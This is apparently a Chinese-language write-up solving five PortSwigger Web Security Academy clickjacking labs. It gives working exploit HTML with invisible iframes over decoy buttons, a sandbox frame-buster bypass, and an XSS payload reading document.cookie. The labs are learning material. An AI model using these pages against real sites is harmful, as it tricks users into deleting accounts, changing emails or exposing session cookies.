Portswigger web security academy:Clickjacking (UI redressing)
1 - Basic clickjacking with CSRF token protection
-
题目描述
- 登陆后可以删除账号,但是该功能点有csrf token保护
-
要求
- 让受害者删掉自己的账号
-
解题过程
-
因为要调CSS,就先用一下材料里给的代码看看(具体参数有问题,自己调整调整,显示没过,然后修改的时候提示solved。。。原本的参数没记下来)
<head> <style> #target_website { position: relative; 1280px; height: 400px; opacity: 0.0000000000001; z-index: 2; } #decoy_website { position:absolute; top:575px; left:100px; z-index:1; } </style> </head> ... <body> <div id="decoy_website"> click </div> <iframe id="target_website" src="https://ac411f1c1e3720d880aa0ddc00c8008d.web-security-academy.net/my-account"> </iframe> </body>
-
2 - Clickjacking with form input data prefilled from a URL parameter
-
题目描述
- 没啥描述的
-
要求
- 利用预填充来修改用户邮箱
-
解题过程
-
访问
/my-account?email=asd@asd.asd,发现邮箱被预填充进页面 -
构造恶意页面,钓鱼(借助上一题的代码)
<head> <style> #target_website { position: relative; 400px; height: 600px; opacity: 0.0000001; z-index: 2; } #decoy_website { position:absolute; top:525px; left:100px; z-index:1; } </style> </head> <body> <div id="decoy_website"> Click me </div> <iframe id="target_website" src="https://ac131f121fdf9d78802b4cc1006300fb.web-security-academy.net/my-account?email=asd@asd.asd"> </iframe> </body>
-
3 - Clickjacking with a frame buster script
-
题目描述
- 这个lab被frame buster保护着
-
要求
- 修改受害者邮箱
-
解题过程
-
材料里有说frame buster,大致意思就是只接受自己是最顶层网页(根节点),关于这个东西google上挺多的,[贴一个])(https://zhuanlan.zhihu.com/p/27310909)
-
但是
iframe指定sandbox为allow-forms或者allow-scripts,且忽略allow-top-navigation会使iframe中的网页不知道自己是否是最顶层网页 -
构造exp
<head> <style> #target_website { position: relative; 400px; height: 600px; opacity: 0.0000001; z-index: 2; } #decoy_website { position:absolute; top:505px; left:100px; z-index:1; } </style> </head> <body> <div id="decoy_website"> Click me </div> <iframe id="target_website" sandbox="allow-forms" src="https://ac741fe61e32394280fe03af00970035.web-security-academy.net/my-account?email=asd@asd.asd"> </iframe> </body>
-
4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS
-
题目描述
- 把Dom based XSS和Clickjacking结合起来
-
要求
alert(document.cookie)
-
解题过程
-
首先找XSS,发现在feedback页面可以使用GET预填充参数,提交后,会把name直接打印出来
-
构造exp
<head> <style> #target_website { position: relative; 1000px; height: 1000px; opacity: 0.00000001; z-index: 2; } #decoy_website { position:absolute; top:805px; left:100px; z-index:1; } </style> </head> <body> <div id="decoy_website"> Click me </div> <iframe id="target_website" src="https://ac2c1f701efa1dee807e67af00d40001.web-security-academy.net/feedback?name=%3Cimg/src=x%20onerror=alert(document.cookie)%3E&email=asd@asd.com&subject=asd&message=asd"> </iframe> </body>
-
5 - Multistep clickjacking
-
题目描述
- 这个lab的账号相关的功能点被csrf token保护着,并且有一个确认对话框来防止点击劫持
-
要求
- 让受害者删除自己的账号
-
解题过程
-
多了个对话框。。。相比实际场景,不需要动态显示就很简单了
-
上exp
<head> <style> #target_website { position: relative; 1000px; height: 1000px; opacity: 0.0000001; z-index: 2; } #decoy_website_1 { position:absolute; top:495px; left:60px; z-index:1; } #decoy_website_2 { position:absolute; top:285px; left:190px; z-index:1; } </style> </head> <body> <div id="decoy_website_1"> Click me first </div> <div id="decoy_website_2"> Click me next </div> <iframe id="target_website" src="https://ac871f9f1e4e40b7801a875000290076.web-security-academy.net/my-account"> </iframe> </body>
-